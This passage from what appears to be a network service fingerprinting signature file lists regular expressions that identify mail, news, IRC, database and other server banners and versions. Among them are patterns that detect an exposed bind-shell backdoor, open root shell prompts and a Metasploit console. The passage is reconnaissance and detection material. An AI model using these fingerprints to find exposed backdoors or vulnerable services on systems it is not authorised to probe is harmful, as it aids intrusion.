OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 